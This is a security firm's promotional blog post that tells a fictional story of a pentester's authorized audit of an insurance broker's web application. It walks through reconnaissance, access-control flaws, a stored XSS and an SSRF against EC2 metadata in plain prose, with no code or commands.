Pentest stories
This series of articles makes you follow Jean, an imaginary pentester, in his missions of intrusion tests. Clients and exploit stories are just as imaginary, but correspond to reality and are based on the experiences of DSecBypass experts.
It aims to popularize and ease the understanding of the different pentest offers.
Website pentesting
Jean has a lot of experience in web site pentesting: it’s a scope that overlaps with external penetration tests and sometimes also internal security audits. What he likes most is finding logical vulnerabilities in a well-developed application: the developers followed secure development best practices, used modern technologies, but did not anticipate certain use cases. This is when the exchanges with the customer’s teams are the most interesting since it allows you to tackle advanced subjects. Still, Jean fancies as well a website coded in PHP 10 years ago and ticking all the boxes of the TOP10 OWASP 🙂
Today, Jean has to audit the website of an insurance broker company. They developed a web application that allows employees to easily manage clients, insurances and export reports on the various indicators. The scope consists of two URLs:
The scenarios selected are:
-
- a “Black box” scenario – the pentester only has information about the perimeter of the mission
- a “Grey box” scenario – the auditor is assigned one or more accounts on the application in order to evaluate the permission model and test more features
For this pentest, Jean has two “employee” accounts and two “manager” accounts on https://app[.]courtier.fictif, and another “administrator” account on https://admin-app[.]courtier.fictif/.
He will thus be able to test the permission model vertically (can an employee become a manager?) and horizontally (can an employee access another employee’s data?). The administrator account will allow you to test the features only accessible to application administrators.
In order to follow the logic of the scenarios, the intrusion test will start with the “black box” scenario: the pentester must have as little information as possible to simulate the attack of an unauthenticated hacker.
After having checked the information of the mandate, Jean sends an email to the contacts of the mission in order to signify the begining of the tests.
As in an external audit, two recognition phases are carried out: passive reconnaissance, then active reconnaissance.
It checks the data accessible on search engines using Dorks, analyzes the various DNS and certificate data available in order to widen the attack surface and have as much information as possible.
Today he is lucky, the application initially protected by an application firewall (WAF) can be directly accessed, without going through the WAF, using the IP address retrieved from the DNS history. He will therefore be able to carry out his tests without being blocked, and report a first vulnerability.
He launches its active reconnaissance tools: it scans the server ports in search of open services to attack and begins to enumerate the files, folders and applications exposed by the web servers.
These recognition steps are crucial: they make it possible to find what the developers or system administrators did not think they had made accessible. This therefore often gives access to interesting information for the rest of the audit or even less well-protected functionalities.
In this case Jean discovers a file linked to the continuous deployment chain which gives access to the versions of the libraries used and discloses certain internal names used by the client. It is therefore a weakness that will be raised in the report, but above all that could hopefully be used in the rest of the audit.
Apart from this problem, Jean detects a configuration defect at the level of the HTTP headers and some libraries that are vulnerable but cannot be exploited as is. He spent a lot of time scanning exposed APIs but found no black box vulnerabilities. The application is therefore rather secure against an unauthenticated attacker : an anti-bruteforce mechanism exists on the authentication form, if the WAF had not been bypassed Jean would have been blocked when listing folders and files, and the modern technologies used are security “by design” and have been properly used by the developers.
In contrast, authenticated security testing reveals critical issues in the permission model:
- an employee can list the contracts of another
- a manager can modify the employee information of other managers
- a manager can modify his own profile in order to access folders that are not granted to him
Jean also discovers an XSS vulnerability stored in the name of some attachments. It allows an employee to inject malicious JavaScript code into a manager’s browser.
The administration interface is, as quite often, less well protected and offers more sensitive features. Jean discovers several XSS injections there. A feature for configuring a shared folder challenges him: he creates a new one and points it to his server. He receives the request which indicates the presence of an SSRF vulnerability. He also notices that the application displays the message that his server returns. Since the application is hosted in AWS, Jean exploits the SSRF flaw in order to recover the metadata of the EC2 instance and then uses his favorite tools to exploit the AWS keys thus stolen. Although the tenant is not sufficiently secure since IMDSv2 is not used, the developers have assigned a limited role to the EC2 which does not allow taking control of the tenant.
Once the security audit has been completed, he informally communicates a summary of the results to the client at the phone.
đź“š The next day he completes his audit report and sends it to one of his colleagues for proofreading and validation.
He then transmits the report to the client in a secure manner, and exchanges with the teams and management on the results of the security audit of the website and the action plan thanks to the restitution by videoconference.
🛡️ DSecBypass supports you in your website security audits, with quality services and significant experience in this type of service. Do not hesitate to contact us for additional information and/or a personalized quote 📝.
